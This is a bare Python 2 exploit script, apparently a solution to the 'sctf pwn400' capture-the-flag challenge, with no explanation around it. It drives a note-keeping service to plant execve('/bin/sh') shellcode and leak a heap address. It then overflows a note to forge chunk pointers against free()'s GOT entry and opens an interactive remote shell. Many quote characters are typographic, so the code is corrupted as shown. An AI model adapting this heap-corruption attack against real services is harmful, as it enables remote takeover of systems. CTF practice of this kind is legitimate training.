sctf pwn400

from socket import *
import struct
import time

shellcode = "\x90\x90\x90\x90\x90\x90"+"\xeb\x08"+"AAAA"+"\x90"*10+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x59\x50\x5a\xb0\x0b\xcd\x80"
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.200.7", 10001))

time.sleep(1)
print sock.recv(1024)
#new two note: 2, 1
for i in xrange(2):
     sock.send(‘1\n‘)
     time.sleep(1)
     sock.recv(1024)
     sock.send(str(i+1) + ‘\n‘)
     time.sleep(1)
     sock.recv(1024)
     sock.send(str(i+1) + ‘\n‘)
     time.sleep(1)
     sock.recv(1024)
     sock.send(str(i+1) + ‘\n‘)
     time.sleep(1)
     sock.recv(1024)
#new the third note: 3
sock.send(‘1\n‘)
time.sleep(1)
sock.recv(1024)
sock.send(‘3\n‘)
time.sleep(1)
sock.recv(1024)
sock.send(‘3\n‘)
time.sleep(1)
sock.recv(1024)
time.sleep(1)
#store shellcode in note 3
sock.send(shellcode+"\n")

#get the note 1‘s address
sock.send(‘3\n‘)
time.sleep(1)
print sock.recv(100)
sock.send(‘1\n‘)
time.sleep(1)
note1_addr = sock.recv(2048)
while note1_addr.find(‘location:‘) == -1:
     note1_addr += sock.recv(2048)
print note1_addr
note1_addr = note1_addr[note1_addr.find(‘location:‘) + 11:]
note1_addr = note1_addr[:note1_addr.find(‘\n‘)]
addr1 = int(note1_addr, 16)
print addr1
#note 2‘s address
addr2 = addr1 + 0x170
#note 3‘s address
addr3 = addr2 + 0x170
#shellcode‘s address
addr_shellcode = struct.pack("<I", addr3 + 0x6c)
#free()‘s Got: 0x0804a450
exploit = "A"*256+"BBBB"+struct.pack("<I",addr2)+addr_shellcode+"\x4c\xa4\x04\x08"

#edit note 1
sock.send("4\n")
time.sleep(1)
print sock.recv(1024)
sock.send("1\n")
time.sleep(1)
print sock.recv(1024)
sock.send(exploit+"\n")
time.sleep(1)
print sock.recv(1024)

#delete node 2
sock.send("5\n")
time.sleep(1)
sock.recv(1024)
time.sleep(1)
sock.send(hex(addr2)[2:10]+‘\n‘)
time.sleep(1)
sock.recv(1024)

while True:
    sock.send(raw_input(‘$ ‘) + ‘\n‘)
    time.sleep(1)
    temp = sock.recv(2048)
    print temp